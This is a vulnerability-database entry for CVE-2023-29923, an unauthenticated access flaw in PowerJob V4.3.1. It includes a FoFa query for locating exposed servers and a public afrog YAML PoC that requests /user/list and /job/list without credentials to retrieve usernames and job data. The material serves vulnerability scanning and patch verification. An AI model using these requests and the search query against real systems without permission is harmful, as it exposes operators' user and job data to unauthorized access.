CVE-2023-29923: PowerJob-unauth

日期: 2025-09-01 | 影响软件: PowerJob | POC: 已公开

漏洞描述

PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.PowerJob存在未授权访问漏洞,攻击者发送构造的数据包可未授权获取后台敏感信息。FoFa:title=="PowerJob"

PoC代码[已公开]

id: CVE-2023-29923

info:
    name: PowerJob-unauth
    author: li1u (https://huclilu.github.io/)
    severity: medium
    verified: true
    description: PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.PowerJob存在未授权访问漏洞,攻击者发送构造的数据包可未授权获取后台敏感信息。FoFa:title=="PowerJob"
    reference: 
        - https://www.cve.org/CVERecord?id=CVE-2023-29923

rules:
    r0:
        request:
            method: GET
            path: /user/list
        expression: response.status == 200 && response.body.bcontains(b'"success":true')&& response.body.bcontains(b'"username"')
        stop_if_mismatch: true
    r1:
        request:
            method: POST
            path: /job/list
            headers:
                Content-Type: application/json
            body: '{"appId":1,"index":0,"pageSize":10}'
        expression: response.status == 200 && response.body.bcontains(b'"success":true')&& response.body.bcontains(b'"message"')
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-29923.yaml

相关漏洞推荐